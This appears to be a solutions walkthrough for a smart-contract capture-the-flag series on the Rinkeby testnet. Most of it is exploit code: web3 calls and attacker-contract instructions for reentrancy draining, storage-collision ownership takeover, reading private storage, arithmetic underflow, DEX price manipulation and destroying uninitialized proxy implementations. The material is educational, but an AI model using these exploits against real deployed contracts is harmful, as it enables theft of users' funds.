await contract.contribute({ value: toWei("0.0001") });
await contract.sendTransaction({ value: toWei("0.0001") });
await contract.withdraw();
await contract.Fal1out({ value: toWei("0.0001") });
await contract.collectAllocations();
Compile CoinFlipAttack.sol and deploy it to the Rinkeby testnet with e.g. Remix IDE and MetaMask (Injected Web3).
Do not forget to specify the level instance
address when deploying the attacker contract (constructor).
Afterwards, just call the callFlipWithCorrectGuess()
function 10 times.
Compile TelephoneProxy.sol and deploy it to the Rinkeby testnet with e.g. Remix IDE and MetaMask (Injected Web3).
Afterwards, just call the giveMeTelephoneOwnership(address _telephoneContract)
function with the level instance
address as first argument.
const balance = Number(await contract.balanceOf(player));
await contract.transfer(level /* can be any address except own */, balance + 1 /* create underflow in contract */);
See solidity function delegatecall.
await contract.sendTransaction({ data: web3.eth.abi.encodeFunctionSignature("pwn()") });
See solidity function selfdestruct.
Compile ForcePay.sol and deploy it to the Rinkeby testnet with at least 0.001 ETH.
Afterwards, just call the destroyAndLeaveBalanceAt(address _contract)
function with the level instance
address as first argument.
const password = await web3.eth.getStorageAt(instance, 1); // get storage variable at index 1 of contract (although it's private!)
await contract.unlock(password);
Compile King4Ever.sol and deploy it to the Rinkeby testnet with at least 0.001 ETH and the level instance
address as argument (constructor).
The fallback function of this contract is going to revert any subsequent transaction which is trying to claim the throne.
Compile ReentranceAttack.sol and deploy it to the Rinkeby testnet with e.g. 0.0001 ETH and the level instance
address as argument (constructor).
Afterwards, just call the drainVictim()
function to steal all funds from the level contract. Once this is done, do not forget to call the withdraw()
function to get the funds back to your wallet.
Compile Building.sol and deploy it to the Rinkeby testnet with e.g. Remix IDE and MetaMask (Injected Web3).
Afterwards, just call the goToTop(address _elevatorContract)
function with the level instance
address as first argument.
See Layout of State Variables in Storage.
const data2_32 = await web3.eth.getStorageAt(instance, 5); // get private storage variable 'data[2]' from contract
const data2_16 = data2_32.substring(0, data2_32.length - 32); // remove last 16 bytes from data[2], i.e. typecast from bytes32 to bytes16
await contract.unlock(data2_16);
See Solidity - Conversions.
Compile GatebreakerOne.sol and deploy it to the Rinkeby testnet with the level instance
address as argument (constructor). Done!
See Bypass Contract Size Check.
Compile GatebreakerTwo.sol and deploy it to the Rinkeby testnet with the level instance
address as argument (constructor). Done!
Circumvent the token lock using (non-overrided) ERC20 base class functions:
const playerBalance = await contract.balanceOf(player);
await contract.approve(player, playerBalance); // approve self to transfer tokens using 'transferFrom' function
const tokenReceiver = web3.eth.accounts.create(); // create new account to receive tokens
await contract.transferFrom(player, tokenReceiver.address, playerBalance); // transfer tokens to new account
See solidity function delegatecall.
Compile MadLibraryContract.sol and deploy it to the Rinkeby testnet with e.g. Remix IDE and MetaMask (Injected Web3).
Afterwards, just call the attack1(address _preservationContract)
and attack2(address _preservationContract)
functions with the level instance
address as first argument.
Note that the attack needed to be split into two distinct transactions due to cached storage reads in Solidity.
Contract addresses in the EVM (Ethereum Virtual Machine) are deterministic, see How is the Ethereum contract address calculated?.
Furthermore, it is crucial to understand RLP (Recursive Length Prefix) coding, see RLP | Ethereum Wiki and Online RLP en-/decoder.
Assuming call to function generateToken(string memory _name, uint256 _initialSupply)
was the first transaction of the freshly deployed Recovery
contract: nonce = 1
const tempHash = web3.utils.soliditySha3(RLP([ instance, nonce ])); // nonce = 1
--> RLP(nonce) = RLP(1) = "0x01"
--> RLP(instance) = 0x80 + bytelen(instance), instance = 0x80 + 20, instance = "0x94", instance
-> ... := "0x94", instance, "0x01"
-> RLP([ instance, nonce ]) = RLP("0x94", instance, "0x01") = 0xC0 + bytelen(...), ... = 0xC0 + 22, ... = "0xD6", ...
const tempHash = web3.utils.soliditySha3("0xD6", "0x94", instance, "0x01");
const contractAddress = "0x" + tempHash.slice(26); // slice '0x' and first 12 bytes -> address of lost 'SimpleToken' contract
// Call 'destroy(address payable _to)' function of 'SimpleToken' contract to recover funds.
const destroySig = web3.eth.abi.encodeFunctionSignature("destroy(address)"); // 'address payable' is just 'address' in ABI
const destroyParam = web3.eth.abi.encodeParameter("address", player);
const destroyData = destroySig + destroyParam.slice(2); // slice '0x' before concatenating hex strings
await web3.eth.sendTransaction({ from: player, to: contractAddress, data: destroyData });
See How to deploy contracts using raw assembly opcodes for an in-depth walk-through.
Contract bytecode / opcodes (see Ethereum Virtual Machine Opcodes):
// codecopy(t=0x00, f=0x0C, s=0x0A) ... copy runtime code to memory
60 0A // push1 0x0A (size of runtime code)
60 0C // push1 0x0C (offset of runtime code = size of init code)
60 00 // push1 0x00 (destination memory location)
39 // codecopy
// return(p=0x00, s=0x0A) ... return data at memory location 0x00 with size 0x0A bytes
[return runtime code to EVM]
60 0A // push1 0x0A
60 00 // push1 0x00
F3 // return
// --- RUNTIME CODE ---
// mstore(p=0x00, v=0x2A) ... store byte 0x2A (42) at memory location 0x00
60 2A // push1 0x2A
60 00 // push1 0x00
52 // mstore
// return(p=0x00, s=0x20) ... return data at memory location 0x00 with size 0x20 (32) bytes
[return uint256(42) to caller]
60 20 // push1 0x20
60 00 // push1 0x00
F3 // return
Web3 code:
const contractBytes = "0x600A600C600039600A6000F3602A60005260206000F3";
const solverContract = await web3.eth.sendTransaction({ from: player, data: contractBytes });
await contract.setSolver(solverContract.contractAddress);
See Collisions of Solidity Storage Layouts.
await contract.make_contact();
await contract.retract(); // use underflow to make all 2^256 storage slots accessible via 'codex' array
/* Storage slot layout:
0: owner (address), contact (bool)
1: codex.length (uint256)
keccak256(1): codex[0] (bytes32)
keccak256(1)+i: codex[i] (bytes32)
const uint256_range = web3.utils.toBN(2).pow(web3.utils.toBN(256)); // 2^256
const codex_offset = web3.utils.toBN(web3.utils.soliditySha3(1)); // 1 is the storage slot of 'codex[]'
const storage0_relative_to_codex = uint256_range.sub(codex_offset); // compute index of storage slot 0 relative to 'codex[]'
const storage0_new_content = "0x000000000000000000000001" + player.slice(2); // build 32 bytes hex string with player address and 'contact = true'
await contract.revise(storage0_relative_to_codex, storage0_new_content); // replace contract owner with player
See Difference between require and assert and the difference between revert and throw.
Compile Deny.sol and deploy it to the Rinkeby testnet with the level instance
address as argument (constructor). Done!
Compile Buyer.sol and deploy it to the Rinkeby testnet with e.g. Remix IDE and MetaMask (Injected Web3).
Afterwards, just call the buy(address _shopContract)
function with the level instance
address as first argument.
Take a close look at this function of the Dex
contract while considering how the approve
function of an ERC20
contract works:
function approve(address spender, uint amount) public {
SwappableToken(token1).approve(spender, amount);
SwappableToken(token2).approve(spender, amount);
The approve
function of an ERC20
contract allows the spender
to transfer amount
of tokens from the msg.sender
In this case the msg.sender
is the Dex
contract, therefore we can easily drain the tokens from the contract by calling the transferFrom
function of the token ERC20
Example for 'Token 1':
await contract.approve(player, 100);
const addressToken1 = await contract.token1();
const transferSig = web3.eth.abi.encodeFunctionSignature("transferFrom(address,address,uint256)");
const transferParams = web3.eth.abi.encodeParameters(["address", "address", "uint256"], [contract.address, player, 100]);
const transferData = transferSig + transferParams.slice(2);
await web3.eth.sendTransaction({ from: player, to: addressToken1, data: transferData });
This works as expected if the challenge is deployed on a local testnet. However, it does not work with the actual level which is currently (as of 2022-02-12) deployed on the Rinkeby testnet.
I observed in the tokens' Approve
events that the msg.sender
is not the address of the Dex
contract but the player
address. This means that the level is not using the same code which is shown to us.
Probably the underlying ERC20
contract code was locally modified to use tx.origin
instead of msg.sender
, but this is just a wild guess.
However, we can still solve the level by beating the price logic of the smart contract:
await contract.approve(instance, 110); // approve contract to spend max. amout of tokens player could possibly have
const addressToken1 = await contract.token1();
const addressToken2 = await contract.token2();
// just swap tokens back and forth
await contract.swap(addressToken1, addressToken2, await contract.balanceOf(addressToken1, player));
await contract.swap(addressToken2, addressToken1, await contract.balanceOf(addressToken2, player));
// --> player has 24 of 'Token 1'
// just swap tokens back and forth, again
await contract.swap(addressToken1, addressToken2, await contract.balanceOf(addressToken1, player));
await contract.swap(addressToken2, addressToken1, await contract.balanceOf(addressToken2, player));
// --> player has 41 of 'Token 1'
// we are getting closer ...
await contract.swap(addressToken1, addressToken2, await contract.balanceOf(addressToken1, player));
// --> player has 65 of 'Token 2', and Dex has 110 of 'Token 1' and 45 of 'Token 2'
await contract.swap(addressToken2, addressToken1, await contract.balanceOf(addressToken2, instance));
// --> player has 110 of 'Token 1' and 20 of 'Token 2', and Dex has 0!!! of 'Token 1' and 90 of 'Token 2'
// DONE!
This challenge has the same approve
function we can exploit as the Dex
contract of the previous challenge.
However, we can also beat this level by creating an own malicious ERC20
token an trade it on DexTwo
Compile SwappableTokenThree.sol and deploy it to the Rinkeby testnet with e.g. Remix IDE and MetaMask (Injected Web3).
Do not forget to specify the level instance
address when deploying the token contract (constructor).
Afterwards, just call the drainDex()
function of our malicious token.
// become owner of PuzzeWallet, because storage slot overlaps with pendingAdmin of PuzzleProxy
const proposeSig = web3.eth.abi.encodeFunctionSignature("proposeNewAdmin(address)");
const proposeParam = web3.eth.abi.encodeParameter("address", player);
const proposeData = proposeSig + proposeParam.slice(2);
await web3.eth.sendTransaction({ from: player, to: contract.address, data: proposeData });
// whitelist player because player = owner already
await contract.addToWhitelist(player);
// build call "multicall([ deposit(), multicall([ deposit() ]) ])" to deposit msg.value twice
const depositSig = web3.eth.abi.encodeFunctionSignature("deposit()");
const multicallSig = web3.eth.abi.encodeFunctionSignature("multicall(bytes[])");
const innerMulticallParam = web3.eth.abi.encodeParameter("bytes[]", [ depositSig ]);
const innerMulticallData = multicallSig + innerMulticallParam.slice(2);
const outerMulticallParam = web3.eth.abi.encodeParameter("bytes[]", [ depositSig, innerMulticallData ]);
const outerMulticallData = multicallSig + outerMulticallParam.slice(2);
// deposit contract balance "twice"
const contractBalance = await web3.eth.getBalance(contract.address);
await web3.eth.sendTransaction({ from: player, to: contract.address, data: outerMulticallData, value: contractBalance });
// drain contract
await contract.execute(player, 2*contractBalance, []);
// become admin of PuzzleProxy, because storage slot overlaps with maxBalance of PuzzeWallet
await contract.setMaxBalance(player);
In order to destroy the Engine
contract via a delegatecall
to a function that contains selfdestruct
, we need to become the upgrader
first to be allowed to call upgradeToAndCall
Becoming the upgrader
is only possible by calling initialize
. Unfortunately, the Engine
contract is already initialized in the (storage) context of the Motorbike
proxy contract.
But it turns out that the Engine
contract is not initialized in its own (storage) context.
Therefore, we just need to find out the contract address and call initialize
to make our attack work.
Web3 code to get implementation address from proxy contract:
// compute implementation slot according to proxy contract
const engineImplementationSlot = web3.utils.toBN(web3.utils.soliditySha3("eip1967.proxy.implementation")).sub(web3.utils.toBN(1));
// read implementation address from proxy contract
const engineImplementation = await web3.eth.getStorageAt(instance, engineImplementationSlot);
// remove leading zeros to get 20 byte address
const engineAddress = "0x" + engineImplementation.slice(26);
Compile EngineDestructor.sol and deploy it to the Rinkeby testnet with e.g. Remix IDE and MetaMask (Injected Web3).
Afterwards, just call the destroy(address _engineContract)
function with the found engineAddress
as first argument.